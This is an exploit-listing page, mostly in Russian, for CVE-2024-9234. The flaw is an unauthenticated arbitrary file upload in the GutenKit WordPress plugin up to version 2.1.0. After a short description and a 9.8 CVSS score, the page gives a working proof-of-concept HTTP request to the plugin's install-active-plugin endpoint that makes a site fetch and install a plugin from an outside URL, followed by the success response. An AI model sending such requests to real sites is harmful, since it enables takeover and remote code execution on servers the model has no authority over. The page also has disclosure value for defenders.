## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RANDOMROBBIEBF-CVE-2024-9234
# CVE-2024-9234
GutenKit <= 2.1.0 - Неавторизованная произвольная загрузка файлов
# Описание
Плагин GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки прав доступа в функции install_and_activate_plugin_from_external() (конечная точка REST API install-active-plugin) во всех версиях до 2.1.0 включительно. Это позволяет неавторизованным атакующим устанавливать и активировать произвольные плагины или использовать эту функциональность для загрузки произвольных файлов, маскирующихся под плагины.
root@kitploit:~
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
Ссылка для скачивания: Download gutenkit-blocks-addon Version 2.1.0
## POC
root@kitploit:~
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
root@kitploit:~
{"success":true,"data":"Plugin installed successfully!"}